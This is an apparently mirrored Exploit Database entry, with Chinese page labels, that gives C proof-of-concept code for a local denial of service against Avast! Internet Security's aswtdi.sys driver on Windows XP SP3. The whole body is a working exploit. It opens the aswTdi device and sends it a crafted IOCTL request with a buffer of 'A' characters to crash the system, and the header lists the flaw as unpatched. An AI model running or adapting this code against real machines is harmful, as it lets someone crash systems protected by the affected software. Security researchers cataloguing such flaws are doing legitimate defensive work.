Avast! Internet Security – aswtdi.sys Local Denial of Service (PoC)

• Exploit Database
• 14 阅读

• 作者： Nikita Tarakanov
  日期： 2010-11-04
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15420/

• /*
  # Exploit Title: Avast! Internet Security aswtdi.sys 0day Local DoS PoC
  # Date: 2010-11-04
  # Author: Nikita Tarakanov (CISS Research Team)
  # Software Link: http://www.avast.com
  # Version: up to date, version 5.0.677, aswtdi.sys version 5.0.677
  # Tested on: Win XP SP3
  # CVE : CVE-NO-MATCH
  # Status : Unpatched
  */
  #include <windows.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <io.h>
  #include <fcntl.h>
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <errno.h>
  #include <share.h>
  
  
  int main(int argc, char **argv)
  {
  HANDLE hDevice;
  DWORDcb;
  void*buff;
  int len = 0;
  int pfh;
  int outlen = 0, inlen = 0;
  DWORD ioctl = 0x800515A8;
  char deviceName[] = "\\\\.\\aswTdi";
  
  if ( (hDevice = CreateFileA(deviceName,
  GENERIC_READ|GENERIC_WRITE,
  0,
  0,
  OPEN_EXISTING,
  0,
  NULL) ) != INVALID_HANDLE_VALUE )
  {
  printf("Devicesuccesfully opened!\n");
  }
  else
  {
  printf("Error: Error opening device \n");
  return 0;
  }
  
  cb = 0;
  buff = malloc(0x2000);
  if(!buff){
  printf("malloc failed");
  return 0;
  }
  memset(buff, 'A', 0x2000-1);
  ioctl = 0x80000004;
  inlen = 4;
  
  outlen = 4;
  DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff,
  outlen, &cb, NULL);
  free(buff);
  
  printf("done!");
  }